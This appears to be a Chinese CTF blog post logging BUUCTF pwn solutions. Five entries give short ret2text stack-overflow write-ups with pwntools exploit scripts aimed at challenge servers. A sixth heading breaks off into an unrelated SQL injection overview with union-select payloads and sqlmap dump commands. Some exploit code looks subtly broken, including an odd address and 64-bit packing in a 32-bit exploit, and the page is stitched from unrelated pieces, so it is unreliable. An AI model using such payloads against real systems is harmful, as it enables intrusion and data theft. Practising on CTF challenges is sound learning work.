buu刷题记录

1.text_your_nc

签到题,直接nc一下

2.rip

checksec一下,发现没开啥保护,是64位程序

丢进ida,发现gets函数存在栈溢出漏洞

同时发现fun函数,那就是ret2text的题型。

找偏移,构造payload

from pwn import *
#context.log_level='debug'
p = remote('node5.buuoj.cn',29576)
system = 0x4001187
payload = b'a' * 23 + p64(system)
p.sendline(payload)
p.interactive()

3.warmup_csaw_2016
checksec一下,啥也没开,是64位程序

丢进ida里,发现gets函数可以向v5数组里写入超长数据进而造成栈溢出。同样找到了后门函数,又是ret2text。

找offset,构造payload

from pwn import *
#context.log_level='debug'
p = remote('node5.buuoj.cn',29896)
system = 0x400611
payload = b'a' * 0x40 +b'a' * 0x8 + p64(system)
p.sendline(payload)
p.interactive()

4.ciscn_2019_n_1 1

64位程序开启了NX保护

放进ida,一眼还是ret2text

直接构造payload

from pwn import *
#context.log_level='debug'
p = remote('node5.buuoj.cn',29878)
system = 0x4006be
payload = b'a' * 0x30 +b'a' * 0x8 + p64(system)
p.sendline(payload)
p.interactive()

5.pwn1_sctf_2016

开启了NX保护是32位程序

放进ida,首先向S数组读入了32字节,这不足以造成栈溢出

并且在左侧函数栏发现了get_flag函数

通过运行输入尝试发现当我们输入I时,它会将I变为you进行输出,所以我们可以利用这种转换关系来进行栈溢出,这道题实质上还是ret2text

构造payload

from pwn import *
#context.log_level='debug'
p = remote('node5.buuoj.cn',25132)
system = 0x8048F0d
#0x3c = 60
payload = b'I' * 20  + b'a' * 4 + p64(system)
p.sendline(payload)
p.interactive()

6.jarvisoj_level0

### 关于BUU SQL教程及问解决方案 #### 获取当前数据库名称与用户名 对于SQL注入练习,可以通过特定的查询来获取当前使用的数据库名称以及执行查询的用户名。例如,在`/backend/content_detail.php?id=-1 union select database(), user()`这条语句中,通过联合查询的方式,可以成功返回当前数据库的名字和用户的账号信息[^1]。 #### 使用sqlmap自动化工具进行数据提取 当面对可能存在SQL注入漏洞的目标站点时,除了手动构造payload外,还可以借助像sqlmap这样的自动化渗透测试工具来进行更深入的数据挖掘工作。命令行参数如`-D`, `-T`, `-C`分别用于指定目标数据库、表单以及感兴趣的列名;而`--dump`选项则用来导出选定表格中的全部记录。这有助于快速定位并验证潜在的安全隐患[^2]。 #### 探索MySQL内置的信息模式(Information Schema) 为了更好地理解数据库结构,可利用information_schema这一特殊的只读数据库。其中包含了关于其他数据库及其对象的各种元数据,比如库名(`table_schema`)、表名(`tables.table_name`)等重要属性。这些信息可以帮助攻击者进一步探索系统的内部组成情况。值得注意的是,在某些情况下,仅需调整union select后的字段顺序就能实现所需信息的有效展示[^3]。 #### 实战案例分享 在一个具体的实例中提到,如果已知某页面存在三个显示区域,则可以直接尝试使用如下形式的SQL注入表达式:`id=-1 union select 1,'fllllag',null from id--+` 来试图读取名为'id'的表内的flag值。此方法展示了如何巧妙运用现有条件完成特定任务的同时也提醒开发者注意输入校验的重要性[^4]。 ```sql SELECT version(); ``` 上述代码片段可用于请求服务器端所运行的具体MySQL版本号。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值